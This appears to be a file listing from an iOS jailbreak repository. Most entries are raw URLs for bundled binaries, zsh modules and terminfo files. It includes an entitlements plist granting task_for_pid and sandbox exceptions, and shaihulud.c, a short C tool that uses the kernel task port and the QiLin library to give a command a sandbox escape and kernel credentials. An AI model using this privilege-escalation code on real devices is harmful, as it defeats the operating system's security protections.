--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uname
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vim
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/vm_stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/vm_stat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/wc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/wc
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/what:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/what
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/which:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/which
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xargs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xargs
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/xxd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/xxd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dbclient
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbear.orig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearkey
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/dropbearmulti:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/dropbearmulti
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/filemon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/filemon
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jlutil:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jlutil
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/joker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/joker
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/jtool:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/jtool
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/procexp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/procexp.ent:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | platform-application
5 |
6 | com.apple.private.security.sandbox.debug-mode
7 |
8 | com.apple.security.temporary-exception.sbpl
9 |
10 | (allow signal)
11 | (allow process-info-listpids)
12 | (allow process-info*)
13 |
14 | com.apple.security.exception.process-info
15 |
16 | get-task-allow
17 |
18 | task_for_pid-allow
19 |
20 | com.apple.system-task-ports
21 |
22 | com.apple.private.network.statistics
23 |
24 | com.apple.wlan.authentication
25 |
26 | com.apple.private.security.container-required
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/qilin.o
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/shaihulud
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/shaihulud.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "QiLin.h"
3 | #include
4 |
5 | #include
6 |
7 | void doNothing(void ) {};
8 | int main (int argc, char **argv)
9 | {
10 |
11 | void setDebugReporter (status_func *Func);
12 |
13 | setDebugReporter(doNothing);
14 |
15 | mach_port_t kernel_task;
16 |
17 | kern_return_t host_get_special_port(task_t, int node, int which, mach_port_t *);
18 | kern_return_t kr=host_get_special_port(mach_host_self(), 0, 4, &kernel_task);
19 |
20 | if (argc < 2) {
21 | fprintf(stderr,"Usage: shaihulud _cmd_ [_args_]\n");
22 | fprintf(stderr,"Bestow the might of ShaiHulud (Sandbox escape + kernel credentials) on command\n");
23 | exit(1);
24 |
25 | }
26 |
27 | int slide = 0 ;
28 | FILE *ss = fopen("/tmp/slide.txt","r");
29 | if (ss) { fscanf (ss, "0x%x", &slide); fclose(ss); }
30 |
31 |
32 | int rc = initQiLin (kernel_task, 0xfffffff007004000 + slide);
33 |
34 | if (rc) { fprintf(stderr,"Qilin Initialization failed!\n"); return rc;}
35 |
36 | int spawnAndShaiHulud (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5);
37 | rc = spawnAndShaiHulud (argv[1], argv[2], NULL, NULL, NULL,NULL);
38 |
39 |
40 | }
41 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/bin/wget:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/bin/wget
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbear.orig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbear.orig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/dropbearkey:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/dropbearkey
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/attr.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/cap.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/clone.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/compctl.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complete.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/complist.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/computil.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/curses.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/datetime.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/deltochar.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/example.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/files.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/langinfo.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mapfile.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/mathfunc.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/newuser.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/parameter.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/regex.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/socket.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/stat.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/system.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/system.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/tcp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/tcp.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/termcap.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/termcap.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/terminfo.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/terminfo.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zftp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zftp.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zle.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zle.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zleparameter.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zprof.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zprof.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zpty.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zpty.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zselect.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zselect.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zutil.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/local/lib/zsh/5.0.8/zsh/zutil.so
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/chown:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/chown
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/ioreg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/ioreg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/joreg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/joreg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/kextstat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/kextstat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/ltop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/ltop
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/netstat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/netstat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/sysctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/sysctl
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/sbin/taskpolicy:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/sbin/taskpolicy
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+arrows:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+arrows
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+csr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+csr
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+cup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+cup
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+enq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+enq
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+erase:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+erase
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idc
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idl
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idl1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+idl1
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+inittabs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+inittabs
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+local:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+local
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+local1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+local1
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+pp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+pp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+rca:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+rca
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+rep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+rep
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgr
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrbold:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrbold
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrdim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrdim
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrso:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrso
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrul:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+sgrul
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+tabs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi+tabs
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-color-2-emx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-color-2-emx
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-color-3-emx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-color-3-emx
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-emx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-emx
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-generic:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-generic
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-m:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-m
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mini:
